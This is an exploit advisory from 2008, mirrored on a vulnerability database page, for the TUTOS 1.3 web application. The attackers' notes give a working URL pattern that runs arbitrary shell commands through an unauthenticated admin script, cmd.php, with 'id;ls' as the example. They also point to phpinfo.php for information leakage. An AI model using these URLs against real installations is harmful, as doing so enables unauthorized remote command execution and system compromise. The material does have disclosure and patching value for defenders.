Lucene search
tutos-exec.txt
๐๏ธย 07 Jan 2008ย 00:00:00Reported byย H-T TeamTypeย 
ย packetstorm๐ย packetstormsecurity.com๐ย 18ย Views
Command Execution Vulnerability in TUTOS version 1.3 allows unauthorized access to cmd.php and phpinfo.php
Show more
`######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350} #
# HOME : http://no-hack.net #
# Script : TUTOS (Tested in version 1.3) other versions may also be affected. #
# Download : http://www.tutos.org/homepage/index.html #
# BUG : Command Execution Vulnerability #
######################################################################################
(~)| 3xpl0it4t10n
-1- : Command Execution
http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php?cmd=[your command]
>> we dont need a permission admin for access to '/php/admin/cmd.php' :d
exemple : http://site.com/tutos/php/admin/cmd.php?cmd=id;ls
or we can just enter into : http://[TARGEt]/[path_TUTOS]/php/admin/cmd.php
and right the command in [ CMD(*) ] and press enter :d
-2- Get phpinfo
http://[TARGEt]/[path_TUTOS]/php/admin/phpinfo.php
(~)| Explantion By Video :
http://no-hack.net/video/tutos.zip
# greezt : CoNaN , GoLd_M , RoMaNcYxHaCkEr , and all muslims Hackers
######################################################################################
# H-T TeaM {HouSSaMix _ ToXiC350} #
######################################################################################
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo07 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4